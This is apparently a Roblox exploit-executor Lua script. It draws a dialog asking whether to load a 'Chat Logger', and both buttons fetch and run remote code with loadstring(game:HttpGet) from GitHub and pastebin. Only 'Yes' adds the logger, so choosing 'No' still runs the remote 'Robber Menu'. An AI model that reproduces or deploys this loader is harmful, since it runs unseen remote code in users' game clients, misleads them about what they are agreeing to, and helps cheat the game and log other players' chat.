for i,v in pairs(game:GetService("CoreGui"):GetChildren()) do
	if v.Name == "?" then
		v:Destroy()
	end
end

local ScreenGui = Instance.new("ScreenGui")
local MainFrame = Instance.new("Frame")
local Frame = Instance.new("Frame")
local Yes = Instance.new("TextButton")
local No = Instance.new("TextButton")
local UI1 = Instance.new("TextLabel")
local Label = Instance.new("TextLabel")



ScreenGui.Name = "?"
ScreenGui.Parent = game.CoreGui

MainFrame.Name = "Main Frame"
MainFrame.Parent = ScreenGui
MainFrame.Active = true
MainFrame.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
MainFrame.BorderSizePixel = 0
MainFrame.Position = UDim2.new(0.424464822, 0, 0.435679615, 0)
MainFrame.Size = UDim2.new(0, 267, 0, 105)
MainFrame.Draggable = true

Frame.Name = "?"
Frame.Parent = MainFrame
Frame.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.0168942045, 0, 0.031152634, 0)
Frame.Size = UDim2.new(0, 257, 0, 98)

Yes.Name = "Yes"
Yes.Parent = Frame
Yes.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
Yes.BorderSizePixel = 0
Yes.Position = UDim2.new(0.0277087111, 0, 0.554932773, 0)
Yes.Size = UDim2.new(0, 117, 0, 32)
Yes.Font = Enum.Font.SourceSans
Yes.Text = "Yes"
Yes.TextColor3 = Color3.fromRGB(0, 0, 0)
Yes.TextSize = 14.000
Yes.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/mrgunz/S/main/Robber%20Menu"))()
	--- logger ---
	loadstring(game:HttpGet("https://pastebin.com/raw/FrKnCSn6"))()
	wait(1)
	game:GetService("CoreGui")["?"]:Destroy()
end)

No.Name = "No"
No.Parent = Frame
No.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
No.BorderSizePixel = 0
No.Position = UDim2.new(0.529654205, 0, 0.554932773, 0)
No.Size = UDim2.new(0, 117, 0, 32)
No.Font = Enum.Font.SourceSans
No.Text = "No"
No.TextColor3 = Color3.fromRGB(0, 0, 0)
No.TextSize = 14.000
No.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/mrgunz/S/main/Robber%20Menu"))()
	game:GetService("CoreGui")["?"]:Destroy()
end)

UI1.Name = "UI 1"
UI1.Parent = Frame
UI1.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
UI1.BorderSizePixel = 0
UI1.Position = UDim2.new(0, 0, -0.0333778225, 0)
UI1.Size = UDim2.new(0, 262, 0, 20)
UI1.Font = Enum.Font.SourceSans
UI1.Text = ""
UI1.TextColor3 = Color3.fromRGB(0, 0, 0)
UI1.TextSize = 14.000


Label.Name = "?? Label"
Label.Parent = Frame
Label.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
Label.BorderSizePixel = 0
Label.Position = UDim2.new(-0.0155642023, 0, 0.174009681, 0)
Label.Size = UDim2.new(0, 266, 0, 24)
Label.Font = Enum.Font.SourceSans
Label.Text = "Load Chat Logger?"
Label.TextColor3 = Color3.fromRGB(255, 255, 255)
Label.TextSize = 27.000
